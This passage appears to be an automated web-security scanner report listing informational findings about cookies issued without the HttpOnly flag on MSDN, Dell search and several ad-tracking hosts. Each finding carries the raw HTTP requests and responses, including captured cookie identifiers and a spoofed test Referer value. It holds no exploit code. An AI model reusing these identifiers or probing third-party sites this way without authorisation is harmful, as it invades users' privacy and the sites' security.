The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/library/ms533897(v=vs.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; TocHashCookie=ms310241(n)/aa139672(n)/hh309564(VS.85,n)/ms760839(VS.85,n)/ms761729(VS.85,n)/ms761745(VS.85,n)/na/; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_NVR=0=/:1=en-us:2=en-us/library|en-us/evalcenter|en-us/security; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 422187
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: TocHashCookie=ms310241(n)/aa155073(n)/aa902560(n)/aa342502(VS.85,n)/aa342504(VS.85,n)/na/; expires=Thu, 05-Sep-2041 02:23:09 GMT; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:09 GMT
Content-Length: 422187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   

...[SNIP]...

11.77. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=208&cgn=14038&seg=7820 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pixel.33across.com
Proxy-Connection: Keep-Alive
Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:13:41 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217; Domain=.33across.com; Expires=Mon, 03-Sep-2012 21:13:41 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8939182109&seg=150349&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1211914&random=918826
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


11.78. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-46B_c711bvEMM.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-46B_c711bvEMM.gif?labels=_fp.event.Paid+Service+Interest HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pixel.quantserve.com
Proxy-Connection: Keep-Alive
Cookie: mc=4e52c256-eb5bd-332bf-dc3b7; d=ENkBBgHIBw

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EMEBBgHQBw; expires=Sat, 03-Dec-2011 21:13:41 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 04 Sep 2011 21:13:41 GMT
Server: QS

GIF89a.......,.................D..;

11.79. http://pixel.quantserve.com/pixel/p-56WJ0KtIxWJ_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-56WJ0KtIxWJ_2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-56WJ0KtIxWJ_2.gif?r=0.10386542603373528 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4725153
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=EC4BHQHQB7vRC74Rggi_ELqlAA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/unpixel?pixelID=17329&partnerID=166&clientID=3051&key=segment&_qoo=OPT_OUT
Set-Cookie: d=EO4BGgHRB7vRHN4Ri_ELqlA; expires=Sun, 04-Dec-2011 02:30:49 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:49 GMT
Server: QS


11.80. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=xsKlvalg4lwfy8LPcIiVCPKkpSxp_RJng-zvuwC70piejuJEq_LImxDsetEai8Le1n88qWVlF6FRdkauRZlBdQ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2305757;type=hpcom559;cat=hpcom619;ord=1;num=6795315628405.66?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=6981940571811189480; Domain=.turn.com; Expires=Fri, 02-Mar-2012 16:19:49 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 16:19:49 GMT

GIF89a.............!.......,...........D..;

11.81. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898886726b8b8a1ec2f8&rand=1315189888672&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_formattext&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_formattext&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=6981940571811189480; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Set-Cookie: rrs=1002; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Set-Cookie: rds=15222; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:52 GMT


11.82. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=6981940571811189480; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:52 GMT; Path=/
Set-Cookie: rrs=1002; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:52 GMT; Path=/
Set-Cookie: rds=15222; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:52 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:51 GMT


11.83. http://rotation.linuxnewmedia.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rotation.linuxnewmedia.com
Path:   /www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=26&target=_blank&cb=51874693474&charset=ISO-8859-1&loc=http%3A//lwn.net/Articles/456878/%23A&referer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: rotation.linuxnewmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:55 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=d2c2db1d3c3e58afa1d9056aee9746c3; expires=Tue, 04-Sep-2012 01:54:55 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Length: 861
Content-Type: text/javascript; charset=ISO-8859-1

var OX_a7527f57 = '';
OX_a7527f57 += "<"+"script type=\'text/javascript\' src=\'http://eas.apm.emediate.eu/EAS_tag.1.0.js\'><"+"/script>\n";
OX_a7527f57 += "<"+"script type=\"text/javascript\" src=\"h
...[SNIP]...

11.84. http://rotation.linuxnewmedia.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rotation.linuxnewmedia.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=406&campaignid=314&zoneid=26&channel_ids=,&loc=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F%23A&referer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cb=a41a99092e HTTP/1.1
Host: rotation.linuxnewmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
Cookie: OAID=d2c2db1d3c3e58afa1d9056aee9746c3; OAGEO=%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:58 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=d2c2db1d3c3e58afa1d9056aee9746c3; expires=Tue, 04-Sep-2012 01:54:58 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.85. http://search.dell.com/public/css.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.dell.com
Path:   /public/css.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/css.aspx?c=us&l=en&~set=search.dell.com.80 HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://search.dell.com/results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; search_bn=us|bsd|SearchBaynoteEnabled.1; dellsearch=srchb=control&rpp=12; StormPCookie=bandwidth=NA; StormSCookie=bandwidth=NA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Date: Sun, 04 Sep 2011 16:19:57 GMT
Content-Type: text/css; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 16:19:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 123299

#accordionnoresults {padding-top:1px;padding-left:5px}#additionalresultscontrol {margin-left: 10px; margin-top: 10px; }#additionalresultscontrolhr {margin-left: 20px; margin-right: 20px; margin-top: 1
...[SNIP]...

11.86. http://search.dell.com/public/menu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.dell.com
Path:   /public/menu.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/menu.aspx?c=us&l=en&s=bsd&cs=04 HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://search.dell.com/results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; search_bn=us|bsd|SearchBaynoteEnabled.1; dellsearch=srchb=control&rpp=12; StormPCookie=bandwidth=NA; StormSCookie=bandwidth=NA

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:20:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:20:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 68855

// menu definition for c=us&l=en&s=bsd&cs=04
//
var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops
...[SNIP]...

11.87. http://search.dell.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.dell.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:19:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
